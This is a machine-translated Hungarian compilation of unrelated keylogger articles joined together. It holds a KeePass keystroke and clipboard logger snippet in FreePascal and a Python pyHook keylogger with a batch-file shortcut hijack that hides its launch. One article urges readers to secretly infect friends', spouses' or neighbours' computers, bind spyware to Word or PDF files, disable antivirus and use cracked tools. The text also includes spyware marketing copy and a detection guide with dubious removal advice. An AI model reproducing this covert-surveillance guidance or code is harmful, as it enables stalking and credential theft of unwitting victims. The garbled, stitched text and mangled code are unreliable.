A KeePass-on keresztül beírt jelszavak biztonságának ellenőrzésére úgy döntöttem, írok egy egyszerű keyloggert, amely további adatrögzítést tartalmaz a vágólapról. A teljes kód néhány sort vett fel a FreePascalban.
A jelszavak további biztonsági intézkedések és a KeePass megfelelő konfigurálása nélkül meglehetősen sérülékenynek bizonyultak.
A keylogger kódja egy Timer hurokba kerül, amely 10 ms-onként frissül. Használt modulok: Windows és ClipBrd.
//Hasonlítsa össze az f:= billentyűk aktuális állapotát 0-tól 255-ig do if a[f]<>GetAsyncKeyState(f) majd elkezd //Reakció egy billentyű lenyomására, ha KeePass.Checked és (GetAsyncKeyState(f) = 0), akkor Memo1.Caption:= Memo1.Caption + chr(f);<>//Reakció a billentyűlenyomásra, ha nem KeePass.Checked és (GetAsyncKeyState(f)<>0) majd Memo1.Caption:= Memo1.Caption + chr(f);
vége;
//A kulcsok aktuális állapotának mentése egy tömbbe f:= 0 és 255 között do a[f] := GetAsyncKeyState(f);
//Írja meg, ha változtatásokat hajt végre a vágólapon, ha s
Clipboard.AsText then begin s:= Clipboard.AsText;
Memo2.Caption:= Memo2.Caption + s + " ";
vége;A Simple Logger program így néz ki:
A -Keyboard- ablak a billentyűket a kis- és nagybetűktől és a beviteli nyelvtől függetlenül jeleníti meg. Megjelenik az a szimbólum, amelynek száma megegyezik a kulcskóddal: chr(f). A program módosítható úgy, hogy minden szimbólum helyesen jelenjen meg, de ez nem szükséges ehhez a tanulmányhoz.
A -Vágólap- ablakba másolás akkor történik, amikor a puffer tartalma megváltozik.
A Simple Logger másodpercenként 100-szor reagál a vágólap változásaira. Így a jelszó beírása a pufferbe, majd néhány másodperc múlva törlése ebben az esetben nem jelent védelmet.A probléma megoldásához használhatja az Automatikus tárcsázást.
3. Automatikus tárcsázás
A KeePass automatikus tárcsázásra adott válasz egy billentyű lenyomásával történik, nem pedig annak lenyomásával. Ez lehetővé teszi, hogy védelmet kapjon néhány billentyűnaplózóval szemben. Ennek megkerülésére a Simple Logger rendelkezik egy további beállítással: „KeePass Auto-Type”. Ha be van kapcsolva, a naplózó egy billentyű lenyomásakor elindul.KeePass-on keresztüli automatikus tárcsázáskor: Saját bejelentkezési név Hosszú jelszó123
Egy bejegyzés jelenik meg a Simple Loggerben:
A Simple Logger semmilyen módon nem veszi figyelembe a billentyűparancsokat. Amint láthatja, a Shift billentyű speciális karakterként jelenik meg (hasonlóan a „+”-hoz) és a „?”-hoz. A Shift a nagybetű előtt és után is feloldódik. Ez azonban elég a jelszó megértéséhez.
A probléma megoldásához használhatja a KeePass „Kettős automatikus tárcsázási komplexitás” beállítását. Ebben az esetben a KeePass a jelszó egy részét a billentyűzetről, egy részét pedig a vágólapon írja be, megkeverve az értékeket. Ez lehetővé teszi néhány billentyűnaplózó megkerülését.
A Simple Logger a következőképpen reagál az automatikus tárcsázás kettős szövődményére:
- Beillesztés a vágólapról "Ctrl + V" "V◄?"-ként jelent meg;
- Balra nyíl – „%” (kulcskód és szimbólum #37);
- Jobbra nyíl - """ (kulcskód és szimbólum #39).
További védelmi intézkedések segíthetnek a KeePasshoz tervezett keylogger ellen.
4. Kiegészítő védelem
Egyes szoftvercsomagok olyan funkciókkal rendelkeznek, mint például:- Hardveres billentyűzetről történő adatbevitel védelme;
- Biztonságos böngésző.
Védett böngésző használata esetén a Simple Logger segítségével nem lehetett hozzáférni a vágólaphoz és a billentyűzethez. Ráadásul képernyőképeket sem lehetett készíteni.
Konklúzió helyett
Miután megvizsgáltam, hogyan használják alkalmazottaink a KeePasst, azt tapasztaltam, hogy néhány:- ne használjon UAC-t;
- ne használjon automatikus tárcsázót, egyszerűen másolja át a jelszavakat egy pufferen keresztül;
- hagyja nyitva a programot, amikor elhagyja a munkahelyét;
- használja az alapértelmezett beállításokat a biztonsági házirend konfigurálása nélkül.
A KeePass 2.36 legújabb verzióját teszteltem Windows 8.1-en. Az igazságosság kedvéért meg kell jegyezni, hogy ez a probléma nem csak egy KeePass probléma. Sok más jelszómegőrző is létezik kisebb-nagyobb megbízhatósággal, de ez egy másik tanulmány témája.
Linkek
- Egyszerű naplózó a GitHubon
//Kit érdekel, a “SimpleLogger_for_Win64.7z” archívumban talál egy exe fájlt. A program nem teszi lehetővé a teljes kulcsnaplózást, biztonsági kutatási és információs célokra szolgál.
Böngésző plugin
Amint a dartraiden felhasználó megjegyezte, lehetséges a modul használata KeepPassHttp böngésző kiegészítővel együtt PassIFox vagy ChromeIPass. Ez a bővítmény (a fejlesztő szerint) biztosítja a KeePass rekordok biztonságos megjelenítését HTTP-n keresztül.Ez a kombináció lehetővé teszi, hogy automatikusan kitöltse bejelentkezési nevét és jelszavát a böngészőben, amikor a KeePass fel van oldva. A Simple Logger ebben az esetben semmilyen módon nem reagál.
A ChromeIPass gyenge pontja az új jelszó generálása, mert... a vágólapról másolódik és látható a képernyőn. Ebben az esetben jobb, ha magában a KeePass-ban generál egy új jelszót.
Új fő jelszó létrehozása
Arthur_veber szerint:A fő jelszó cseréjekor, valamint új létrehozásakor a csökkentett mód nem használatos.
Ebben az esetben a Simple Logger elfogja a KeePass-ba beírt fő jelszót.
Nem segít az ismert gyártó virtuális képernyő-billentyűzete sem, amely a KeePass autodialerhez hasonlóan billentyűleütési esemény alapján működik.
Nehéz itt tanácsot adni. Valószínűleg fel kell hívnunk a fejlesztők figyelmét erre a problémára.
Egyéb támadási eszközök
Amint arra a qw1 felhasználó mutatott rá elsőként, ha a rendszer, amelyre a KeePass telepítve van, veszélybe kerül, akkor a keyloggeren kívül más támadási eszközök is használhatók. Ebben az esetben a támadás leküzdésére szolgáló műveletek listája az adott helyzettől függ.Sajnos lehetetlen egy cikkben lefedni a jelszavak tárolásához szükséges összes biztonsági intézkedést.
Ki ne akarta volna legalább egyszer menő hackernek érezni magát, és legalább valamit eltörni? :) Még ha nem is, akkor beszéljünk arról, milyen jó lenne jelszót kapni a leveleiből/közösségi hálózatából. egy barát, feleség/férj, szobatárs hálózata gondolta legalább egyszer, mindenki. :) Igen, és valahol el kell kezdeni, végül is! A támadások (hackelés) jelentős része az áldozat számítógépének úgynevezett keyloggerekkel (spyware) való megfertőzése.
Tehát a mai cikkben arról fogunk beszélni, hogy mik azok ingyenes programok a Windows alapú számítógépek megfigyelésére, ahonnan letöltheti a teljes verziójukat, hogyan fertőzheti meg velük az áldozat számítógépét, és mik a használatuk jellemzői.
De először egy kis bevezető.
Mik azok a keyloggerek és miért van rájuk szükség?
Szerintem te magad is kitaláltad, mi az. Általában ezek egyfajta rejtett programok (bár ez nem mindig így van) az áldozat számítógépére telepítve, majd rögzíti az összes billentyűleütést ezen a csomóponton. Sőt, a kattintásokon kívül általában a következőket rögzítik: a kattintás (művelet) dátuma és időpontja, valamint a program, amelyben ezeket a műveleteket végrehajtották (böngésző, beleértve a webhely címét (hurrá, azonnal látjuk, hogy mik a jelszavak). helyi rendszerszolgáltatások (beleértve a Windows bejelentkezési jelszavakat) stb.).
Innen azonnal látszik az egyik probléma: pár percre hozzáfértem a szomszédom számítógépéhez, és szeretném lekérni a jelszavát a VK-tól! Feltelepítettem a csodaprogramot és visszaadtam a számítógépet. Hogyan kereshetek később jelszavakat? Módot keres, hogy újra elvehesse tőle a számítógépet? A jó hír: általában nem. A legtöbb keylogger nem csak a műveletek teljes felhalmozott adatbázisát képes helyben tárolni, hanem távolról is elküldeni. Számos lehetőség van a naplók küldésére:
- A rögzített e-mail (több is lehet) a legkényelmesebb lehetőség;
- FTP szerver (akinek van);
- SMB szerver (egzotikus, és nem túl kényelmes).
- Rögzített flash meghajtó (behelyezi az áldozat számítógépének USB-portjába, és az összes napló automatikusan oda másol láthatatlan módban!).
Miért van szükség erre? Azt hiszem, a válasz egyértelmű. A jelszavak banális ellopásán kívül egyes keyloggerek számos más szép dolgot is tehetnek:
- Levelezés naplózása meghatározott közösségi hálózatokon. hálózatok vagy azonnali üzenetküldők (például Skype).
- Képernyőképek készítése a képernyőről.
- Webkamera adatok megtekintése/rögzítése (ami nagyon érdekes lehet).
Hogyan kell használni a keyloggereket?
És ez egy nehéz kérdés. Meg kell értenie, hogy nem elég egy kényelmes, funkcionális, jó keylogger megtalálása.
Így, mi kell egy kémprogram sikeres működéséhez?:
- Rendszergazdai hozzáférés egy távoli számítógéphez.
Ráadásul ez nem feltétlenül jelent fizikai hozzáférést. Könnyen elérheti az RDP-n (Remote Desktop Service) keresztül; TeamViewer; AmmyAdmin stb.
Általános szabály, hogy a legnagyobb nehézségek ehhez a ponthoz kapcsolódnak. Nemrég azonban írtam egy cikket arról, hogyan szerezhetek rendszergazdai jogokat a Windows rendszerben. - Névtelen e-mail / ftp (amely alapján nem lesz azonosítva).
Természetesen, ha megtöröd Shura nénit a szomszédodért, ez a pont nyugodtan elhagyható. Ahogy az is, ha mindig kéznél van az áldozat számítógépe (ja, nézd meg a testvéred jelszavait). - Működő víruskeresők / belső Windows védelmi rendszerek hiánya.
A legtöbb nyilvános billentyűnaplózót (amelyekről alább lesz szó) a víruskereső szoftverek túlnyomó többsége ismeri (bár vannak olyan naplózó vírusok, amelyek be vannak építve az operációs rendszer kernelébe vagy a rendszermeghajtóba, és a víruskeresők már nem tudják észlelni vagy megsemmisíteni őket, még akkor sem, ha észlelte őket). A fentiek miatt az antivírus szoftvereket, ha vannak ilyenek, kíméletlenül meg kell semmisíteni. A vírusirtókon kívül az olyan rendszerek, mint a Windows Defender (ezek először a Windows 7 és újabb verzióiban jelentek meg) is veszélyt jelentenek a kémprogramjainkra. Gyanús tevékenységet észlelnek a számítógépen futó szoftverekben. A Google-on könnyen találhat információkat arról, hogyan lehet megszabadulni tőlük.
Talán ezek mind a szükséges és elégséges feltételek ahhoz, hogy sikeresek legyünk mások jelszavainak / levelezésének / fotóinak vagy bármi másnak, amibe bele akartok férkőzni.
Milyen típusú kémprogramok léteznek, és honnan tudom letölteni őket?
Tehát kezdjük a napi gyakorlatom során használt főbb keyloggerek áttekintésével, a teljes verziójuk ingyenes letöltésére mutató linkekkel (azaz jelenleg minden verzió a legújabb (amire lehet gyógymódot találni) és már működő és tesztelt repedésekkel).
0. A patkány!
Értékelések (10-ből):
- Lopakodó: 10
- Kényelem/felhasználhatóság: 9
- Funkcionalitás: 8
Ez csak egy bomba, nem egy keylogger! Működőképes állapotban 15-20 KB-ot vesz igénybe. Minek csodálkozni: teljes egészében assembly nyelven íródott (a veterán programozók könnyeket hullattak), és többnyire lelkes hackerek írták, aminek köszönhetően a titkosságának szintje egyszerűen elképesztő: operációs rendszermag szinten működik!
Ezenkívül a csomag tartalmazza a FileConnector-t - egy mini-programot, amely lehetővé teszi, hogy ezt a keyloggert bármilyen programmal összekapcsolja. Ennek eredményeként kapsz egy közel azonos méretű új exe-t, és indításkor pontosan úgy működik, mint a program, amivel összeragasztottad! De az első indítás után a keylogger automatikusan láthatatlan módban települ az Ön által korábban megadott naplóküldési paraméterekkel. Kényelmes, nem?
Kiváló lehetőség social engineeringre (játékfájlt/prezentációt hozz el egy barátodnak flash meghajtón, vagy akár csak egy Word dokumentumot (elmondom, hogyan lehet olyan exe fájlt létrehozni, amely elindít egy adott word/excel fájlt az egyikben következő cikkeim), indítsa el, minden rendben van és csodálatos, de a barát már láthatatlanul megfertőződött!). Vagy egyszerűen elküldi ezt a fájlt egy barátjának e-mailben (lehetőleg egy linket a letöltéshez, mivel a modern levelezőszerverek tiltják az exe fájlok küldését). Természetesen a telepítés során továbbra is fennáll a víruskereső szoftver kockázata (de ez a telepítés után nem fog létezni).
Egyébként néhány más technika segítségével bármilyen rejtett telepítési disztribúciót (ezek megtalálhatók a The Rat!-ben és az Elite keylogger-ben) nem csak exe fájlokkal (amelyek még mindig gyanút keltenek a többé-kevésbé haladó felhasználókban), hanem azt is. közönséges word / excel és akár pdf fájlokkal is! Soha senki nem fog gondolni semmit egy egyszerű pdf-ről, de ez nem így van! :) Hogy ez hogyan történik, az egy egész külön cikk témája. Azok, akik különösen buzgók, kérdéseket tehetnek fel nekem a visszajelzési űrlapon keresztül. ;)
Összességében a The Rat! nagyon sokáig és sokat leírható. Ez sokkal jobban sikerült, mint én. Ott van egy letöltési link is.
1. Elit keylogger
Értékelések (10-ből):
- Lopakodó: 10
- Kényelem/felhasználhatóság: 9
- Funkcionalitás: 8
Talán az egyik legjobb keylogger, amit valaha készítettek. Képességei a szabványos készleten kívül (az alkalmazások / ablakok / webhelyek kontextusában az összes kattintás elfogása) magukban foglalják az azonnali üzenetküldő üzenetek, a webkameráról származó képek elfogását, és - ami NAGYON fontos! - a WinLogon szolgáltatás jelszavainak lehallgatása. Más szóval, elfogja a Windows bejelentkezési jelszavait (beleértve a tartományi jelszavakat is!). Ez lehetővé vált a rendszer-illesztőprogram-szinten végzett munkájának és az operációs rendszer indítási szakaszában történő elindításának köszönhetően. Ugyanezen funkciónak köszönhetően ez a program teljesen láthatatlan marad mind a Kasperosky, sem az összes többi rosszindulatú program elleni szoftver számára. Őszintén szólva még egyetlen keyloggerrel sem találkoztam, aki képes lenne erre.
Azonban nem szabad túlságosan becsapnia magát. Magát a telepítőt a vírusirtók nagyon könnyen felismerik, és telepítéséhez rendszergazdai jogokra és az összes víruskereső szolgáltatás letiltására van szükség. A telepítés után minden esetben minden tökéletesen működik.
Ezenkívül a leírt funkció (az operációs rendszer kernel szintjén működik) követelményeket vezet be az operációs rendszer verziójára vonatkozóan, amelyen a keyloggerek működni fognak. Az 5-5.3-as verzió (amelynek linkjei alább találhatók) mindent támogat, egészen a Windows 7-ig. A Win 8/10, valamint a Windows szervercsalád (2003/2008/2012) már nem támogatott. Van a 6-os verzió, ami tökéletesen működik, pl. win 8-on és 10-en viszont jelenleg nem lehet feltört verziót találni. Valószínűleg a jövőben megjelenik. Addig is letöltheti az Elite keylogger 5.3-at a fenti linkről.
Nincs hálózati üzemmód, ezért nem alkalmas munkáltatók (munkavállalóik számítógépének figyelésére) vagy egy teljes embercsoport általi használatra.
Fontos szempont, hogy előre meghatározott beállításokkal (például egy megadott e-mail címmel, ahová a naplókat el kell küldeni) telepítési disztribúciót hozhatunk létre. Ugyanakkor a végén kap egy disztribúciós készletet, amely elindításakor egyáltalán nem jelenít meg semmilyen figyelmeztetést vagy ablakot, és telepítés után akár önmagát is tönkreteheti (ha bejelöli a megfelelő opciót).
Számos képernyőkép az 5-ös verzióról (hogy megmutassa, milyen szép és kényelmes minden):
2. All-in-one keylogger.
Értékelések (10-ből):
- Lopakodó: 3
- Kényelem/felhasználhatóság: 9
- Funkcionalitás: 8
Ez is egy nagyon-nagyon kényelmes dolog. A funkcionalitás az Elite keylogger szintjén van. A titkolózásnál rosszabb a helyzet. A Winlogon jelszavakat a rendszer már nem fogja el, nem illesztőprogram, és nincs beépítve a kernelbe. Telepítve azonban rendszer- és rejtett AppData-könyvtárakba, amelyekhez nem olyan könnyen hozzáférhetnek a jogosulatlan felhasználók (nem azok, akiknek nevében telepítve van). Ennek ellenére a víruskeresők előbb-utóbb sikeresen megteszik ezt, ami miatt ez a dolog nem különösebben megbízható és biztonságos, ha például munkahelyen saját felettesei után kémkednek. ;) Valamihez ragasztani, vagy a kódot titkosítani, hogy elrejtse az antivírusok elől, nem megy.
A Win OS bármely verzióján működik (ami szép és praktikus).
Ami a többit illeti, minden rendben: mindent naplóz (kivéve a Windows bejelentkezési jelszavakat), elküldi bárhová (beleértve e-mailt, ftp-t, fix pendrive-ot). Kényelmi szempontból is minden kiváló.
3. Spytech SpyAgent.
Értékelések (10-ből):
- Lopakodó: 4
- Kényelem/felhasználhatóság: 8
- Funkcionalitás: 10
Szintén jó keylogger, bár kétes titkossággal. A támogatott operációs rendszer verziók mindegyike lehetséges. A funkcionalitás hasonló az előző opciókhoz. Van egy érdekes önmegsemmisítő funkció egy meghatározott idő elteltével (vagy egy előre meghatározott dátum elérésekor).
Ezen kívül lehetőség van webkameráról videót, mikrofonból hangot rögzíteni, ami szintén nagy népszerűségnek örvendhet, és amivel az előző két képviselő nem rendelkezik.
Van egy hálózati üzemmód, amely kényelmes a számítógépek teljes hálózatának megfigyelésére. Mellesleg, a StaffCop rendelkezik vele (nem szerepel a felülvizsgálatban, mert egy felhasználó - egy személy - számára haszontalan). Talán ez a program ideális arra, hogy a munkaadók kémkedjenek alkalmazottaik után (bár ezen a területen a vezetők feltétel nélkül a StaffCop és a LanAgent – ha Ön jogi személy, mindenképpen az ő irányukba nézzen). Vagy nyomon követni az utódokat, akik szeretnek ülni és nézni a „felnőtt oldalakat”. Azok. ahol nem az elrejtés kell, hanem a kényelem (beleértve a szép naplójelentéseket stb.) és a funkcionalitás a megadott oldalak/programok blokkolásához (a SpyAgent is rendelkezik ilyennel).
4. Spyrix Personal monitor.
Értékelések (10-ből):
- Lopakodó: 4
- Kényelem/felhasználhatóság: 6
- Funkcionalitás: 10
A funkcionalitás az előző jelölt szintjén van, de ugyanazok a problémák a titoktartással. Ezenkívül a funkcionalitás tartalmaz egy érdekességet: fájlok másolását a számítógépbe helyezett USB-meghajtókról, valamint a naplók távoli megtekintését a Spyrix webhelyén található webfiókon keresztül (de egy feltört verziót fogunk letölteni, így nem nekünk dolgozni).
5. Spyrix Personal monitor.
Értékelések (10-ből):
- Lopakodó: 3
- Kényelem/felhasználhatóság: 6
- Funkcionalitás: 8
Nem írom le részletesen, mert... ebben a példányban nincs semmi, ami az előző kémek egyikének ne volt, viszont valakinek tetszhet ez a keylogger (legalábbis a felülete miatt).
Mire jutunk?
A keylogger használatának kérdése inkább etikus, mint technikai, és nagyban függ az Ön céljaitól.
Ha Ön olyan munkáltató, aki irányítani akarja az alkalmazottait, nyugodtan állítsa be a StaffCop-ot, szerezzen be minden alkalmazotttól írásos engedélyt az ilyen tevékenységekhez (ellenkező esetben komolyan meg kell fizetni az ilyen dolgokért), és a munka már készen áll. Bár én személy szerint tudok hatékonyabb módszereket alkalmazottaim teljesítményének növelésére.
Ha Ön egy kezdő informatikus, aki csak szeretné megtapasztalni, milyen érzés megtörni valakit, és hogyan működik ez a dolog általában, akkor fegyverezze fel magát social engineering módszerekkel, és végezzen teszteket barátain a megadott példák bármelyikével. Ne feledje azonban: ha az áldozatok ilyen tevékenységet észlelnek, az nem járul hozzá a barátsághoz és a hosszú élethez. ;) És ezt semmiképpen nem szabad a munkahelyeden tesztelned. Jelölje meg a szavaimat: van tapasztalatom ezzel kapcsolatban. ;)
Ha az a célod, hogy barátod, férjed, szomszédod után kémkedj, vagy esetleg rendszeresen és pénzért csinálod, akkor alaposan gondold át, megéri-e. Hiszen előbb-utóbb vonzanak magukhoz. És nem éri meg: „valakinek más szennyes ruhájában turkálni nem kellemes élvezet”. Ha mégis szükség van rá (vagy esetleg számítógépes bűncselekmények felderítésével foglalkozik, és az ilyen jellegű feladatok a szakmai feladatai közé tartoznak), akkor csak két lehetőség van: A Patkány! és Elite Keylogger. Rejtett telepítési disztribúciók módban, Word / excel / pdf fájlokkal ragasztva. És jobb, ha lehet, friss titkosítóval titkosítva. Csak ebben az esetben garantálhatjuk a biztonságosabb tevékenységet és a valódi sikert.
De mindenesetre érdemes megjegyezni, hogy a keyloggerek hozzáértő használata csak egy kis láncszem a cél elérésében (beleértve az egyszerű támadást is). Nem mindig rendelkezik rendszergazdai jogokkal, nem mindig rendelkezik fizikai hozzáféréssel, és nem minden felhasználó nyitja meg, olvassa el, és még inkább letölti a mellékleteit/linkjeit (hello social engineering), a vírusirtó nem lesz mindig letiltva /a keylogger/cryptor nem mindig lesz ismeretlen számukra . Mindezek és sok kimondhatatlan probléma megoldható, de megoldásuk külön cikkek egész sorozatának témája.
Röviden, Ön most kezdett belemerülni az információbiztonság bonyolult, veszélyes, de hihetetlenül érdekes világába. :)
Őszintén,Lysyak A.S.
Hello, a QUAZAR újra itt van. Ma megmutatom, hogyan hozhat létre egy egyszerű keyloggert Pythonban. Természetesen ez a keylogger nem versenyezhet olyan óriásokkal, mint, de ennek ellenére megtalálja a használatát.
Mi az a keylogger?
A „keylogger” szócikkben részletesen olvashat arról, hogy mi az a keylogger, és milyen típusokról van szó. Ha további anyagokat szeretne találni a témában, használja a webhelykeresőt, amely a jobb felső sarokban található. Csak írja be a "keylogger" vagy a "keylogger" szót.
Egyszerű Keylogger Pythonban
Keylogger létrehozásához szükségünk van:
- Operációs rendszer: Windows vagy MacOs (bármilyen Linux is használható, de személyesen nem próbáltam)
- A célgépre telepített Python, valamint speciális könyvtárak.
Ez az anyag csak tájékoztató jellegű. A cikkben bemutatott információk csak tájékoztató jellegűek. Sem a www.site weboldal szerkesztői, sem a kiadvány szerzője nem vállal felelősséget a cikkben szereplő anyagok által okozott károkért.
Egyszerű keylogger létrehozása Pythonban
Először le kell töltenie és telepítenie kell a Python-t.
Egyszerű Keylogger Pythonban A Python telepítése után telepítenie kell a "pyHook" és a "pywin32" modulokat. Ezen az oldalon 32 és 64 bites verziókat talál a Windows és más operációs rendszerek számára. Töltse le a „PYhook” és „pyWin32” programot a Python és a Windows telepített verziójának (32 bites vagy 64 bites) megfelelően.
Keylogger Pythonban. PYhook modul 
Keylogger Pythonban. pyWin32 modul A letöltés után telepítse és nyissa meg az IDLE (Python GUI) menüt a Start menüből.
Egyszerű Keylogger Pythonban Lépjen a „Fájl” menübe, és kattintson az „Új fájl” elemre. Ezután illessze be a keylogger kódot:
#Név: QUAZAR
#Webhely: www.site
pyHook, pythoncom, sys, naplózás importálása
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(esemény):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(esemény.Ascii)
logging.log(10,chr(event.Ascii))
vissza True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
És mentse el a Keylogger.pyw fájl meghívásával. Csak ne mentse a fájlt a C: gyökérkönyvtárba, ahol rendszergazdai jogokra van szüksége a fájlok másolásához és törléséhez. Hozzon létre egy új mappát a C: meghajtón vagy más olyan helyen, ahol nincs szüksége rendszergazdai jogokra a fájlok másolásához, és mentse oda a Keylogger.pyw fájlt.
A kimeneti jelentésfájlként tetszőleges helyet kiválaszthat „file_log = „C:keyloggerlog.txt”, de lehetőség szerint természetesen valamilyen rejtett helyet a merevlemezen. Ebben a példában a jelentésfájlt lemezre fogom menteni a C: gyökérkönyvtárba. Végül is nincs titkolni valóm.
Keylogger automatikus indítása Pythonban
A keylogger készen áll. Most meg kell győződnünk arról, hogy a keylogger rejtetten indul el a felhasználó elől, és automatikusan elindul, amikor a Windows elindul. Ezt többféleképpen lehet megvalósítani. Próbáljuk meg egy bat fájl segítségével megtenni úgy, hogy a keylogger indítását valamilyen programhoz kapcsoljuk, vagy indításkor regisztráljuk.
Először hozzon létre egy bat fájlt. Másolja ki és illessze be a következő kódot a Jegyzettömbbe:
::Név: QUAZAR
::Webhely: www.site
@echo kikapcsolva
start "" "C:keyloggerkeylogger.pyw"
start "" "C:Program FilesOperalauncher.exe"
Az első sorban meg kell adnia a keylogger.pyw fájl elérési útját (esetemben „C:keylogger.pyw”). A második sorban meg kell adni a felhasználó által általában használt program elérési útját (esetemben az Opera böngészőt).
Szerkesztés után mentse el a fájlt .bat kiterjesztéssel (esetemben logger.bat) a számítógép valamilyen rejtett helyére (esetemben a „C:keylogger.bat”).
Most lépjen az asztalra, és válasszon egy parancsikont egy gyakran használt programhoz (esetemben ez az Opera böngésző). Kattintson az egér jobb gombjával a helyi menü előhívásához, és lépjen a parancsikon tulajdonságaira. Az „Object” mezőben adja meg a „C:keyloggerlogger.bat” keylogger bat fájl elérési útját.
A módosítások elvégzése után a parancsikon is megváltozik. De ez könnyen megoldható a tulajdonságok lapon (lásd a fenti képernyőképet).
Az Elite Keylogger rögzíti a számítógépen beírt összes jelszót, miközben teljesen láthatatlan marad a felhasználók számára! Jelszavakat, dokumentumokat, e-maileket, chat-üzeneteket és még sok mást elfoghat.
Jelszavak
Az Elite Keylogger alacsony szintű illesztőprogram módban működik, és a Windows rendszer előtt indul el, amely lehetővé teszi a jelszavak és a bejelentkezési adatok kiderítését. Kérjük, vegye figyelembe, hogy a Mac verzió nem tudja rögzíteni az OS X bejelentkezési jelszavakat.
Csevegések és levelek rögzítése
Az Elite Keylogger for Windows rögzíti a csevegéseket és az azonnali üzeneteket számos különböző kliensről, beleértve az MSN-t, AOL-t, ICQ-t, AIM-et, GTalk-t, Skype-ot. Az Elite Keylogger for Mac mindkét oldalról rögzítheti a Skype, a Viber, az iChat/Messages és az Adium beszélgetéseit, valamint a kimenő e-maileket.
Hálózati keylogger
Az Elite Keylogger ideális megoldás a számítógép távoli megfigyelésére. Csak egyszer kell telepítenie – és a jelentéseket elküldjük Önnek e-mailben vagy feltöltjük egy FTP szerverre. Ez ideálissá teszi ezt a segédprogramot olyan vállalatok számára, amelyeknek szükségük van az alkalmazottak számítógépének megfigyelésére. Ez az alkalmazás teljesen láthatatlan, és nem észlelheti víruskereső vagy kémprogram-elhárító szoftverrel (ha megfelelően van telepítve).
A legjobb weboldal lehallgatás
Az Elite Keylogger az egyik legjobb spyware program, mivel képes rögzíteni a webhelylátogatásokat MINDEN népszerű böngészőben. Teljesen rögzíti a webhelycímeket az Internet Explorer, Firefox, Safari, Opera, Google Chrome és más böngészőkben. Minden webhely címe naplózásra kerül, a látogatás időbélyegzőjével együtt, így könnyedén nyomon követheti gyermekei online tevékenységét, hogy megbizonyosodjon arról, hogy biztonságban vannak.
Barátságos felület
Nagyon könnyen használható. A telepítés gyors és fájdalommentes még kezdők számára is. Azok számára, akiknek szüksége van rá, az Elite Keylogger fejlettebb lehetőségeket kínál, mint például a távoli telepítés vagy az előkonfigurálás. Csak telepítse, és percek alatt konfigurálhatja és aktiválhatja. Csak jelezze, hogyan szeretné fogadni a naplókat - és már nem is kell megérinteni a spyware adminisztrátor felületét, mert most mindent automatikusan elvégz!
Számos lehetőség jelentések küldésére
Az Elite Keylogger számos jelentési lehetőséget kínál. Elküldhetők Önnek e-mailben, feltölthetők FTP-re, átvihetők egy másik számítógépre a helyi hálózaton, vagy titokban átmásolhatók egy USB-meghajtóra. Az átvitelre szánt rönkök méretére nincs korlátozás.
A hackerek különféle trükköket alkalmaznak a személyazonosságunk ellopására.
A Keylogger egy rosszindulatú alkalmazás vagy eszköz, amelyet sok hack használ annak nyomon követésére, hogy mit gépelünk, kinek és hogyan csatlakozunk a hálózathoz. A Keylogger napjaink egyik legerősebb fenyegetésévé vált, amely képes rögzíteni a beírt szöveget, és megosztani azt a hackerekkel.
A billentyűnaplózó észlelésének és a számítógépről való eltávolításának ismerete segíthet megvédeni személyazonosságát és adatait.
Útmutató lépésről lépésre a Keylogger észleléséhez és a számítógépről való eltávolításához
Nem könnyű felismerni, hogy a számítógépét érinti-e a keylogger, hacsak ez az útmutató nem azonosítja. Természetesen léteznek eszközök és szoftverek a rosszindulatú fenyegetések észlelésére, a manuális észlelésük ismerete hasznos lehet személyazonossága védelmében.
Íme két módja annak, hogy megállapítsa, hogy van-e keylogger telepítve az eszközére vagy sem:
1. módszer. Nyissa meg a Feladatkezelőt a Ctrl + Alt + Delete billentyűkombinációval. Lépjen a folyamatok lehetőségre, és keresse meg a Winlogon nevű folyamat duplikált példányát. Egy ilyen nevű folyamat rendben van, de ha kettő van, akkor a készüléket megfertőzte egy keylogger.
2. módszer: Néha a keylogger megfertőzi az eszközt valamilyen rosszindulatú programon keresztül, amely automatikusan települ az eszközére, amikor online vagyunk. Ha a Vezérlőpultban keresi a nem kívánt programot, akkor egy billentyűnaplózó jelenik meg. A következőképpen észlelheti a nem kívánt programot a Vezérlőpultról:
Lépjen a Start menübe, válassza a Minden program lehetőséget, és tekintse meg az összes telepített programot. Ha olyan programot talál, amelyet nem telepített, távolítsa el. A szükségtelen program eltávolítása után újra kell indítania a készüléket.
Hogyan lehet eltávolítani a Keyloggert
Ha már tudja, hogyan kell felismerni a billentyűzetnaplózót, akkor tudnia kell, hogyan távolítsa el a számítógépről. A kulcsos szekrény a következő két módszerrel távolítható el a készülékből:
1. módszer. Ha talál egy billentyűnaplót a feladatkezelőben, törölje a Winlogon másolatát.
2. módszer. Ha ismeretlen programot talál a rendszerére telepítve, távolítsa el azt.
Ez a kettő a legegyszerűbb módja a keylogger kézi észlelésének és eltávolításának a rendszerről. A kézi módszerek lefektetik az alapot, hogy megvédjék számítógépét a rosszindulatú tevékenységektől, és így megakadályozzák az adatok ellopását.
Vannak olyan szoftverek is a piacon, amelyek segítségével észlelheti a billentyűnaplókat, és eltávolíthatja őket a számítógépről. Megtanulhatja, hogyan lehet észlelni és eltávolítani a billentyűzetről, ha olyan szoftvert telepít, amely képes észlelni és eltávolítani a rosszindulatú eszközt.
A szoftver minden olyan rosszindulatú fájlt keres a számítógépén, amely képes ellopni a benne tárolt információkat, és elküldi a hackereknek.
Ha rosszindulatú fájlokat észlel, a szoftver karanténba helyezi és feldolgozza azokat, törli vagy visszaállítja őket a csapat keresése után.
A szoftver nemcsak átvizsgálja a számítógépet, hanem megakadályozza vagy védi a számítógépet azáltal, hogy letiltja az esetlegesen veszélyeztetett programok automatikus telepítését.
A Keylogger komoly fenyegetéssé vált, mivel egyre többen használnak digitális kütyüket különféle feladatokhoz. Legyen szó online tranzakcióról vagy privát csevegésről, a keyloggerek feltörhetik a részleteket, és rögzíthetik mindazt, amit készülékünk billentyűzetével gépel.
Kétféle keylogger és hogyan hatnak a számítógépére.
A Keyloggernek két típusa van: hardveres és szoftveres keylogger.
Keylogger hardver:
A hardveres keylogger USB-eszközök formájában érkezik, amelyek csatlakoztathatók a számítógépes rendszerhez. Ez a speciális típusú billentyűzetnaplózó a központi feldolgozó egység (CPU) hátuljába van beépítve, és rögzíti a billentyűzet tevékenységét.
Keylogger szoftver:
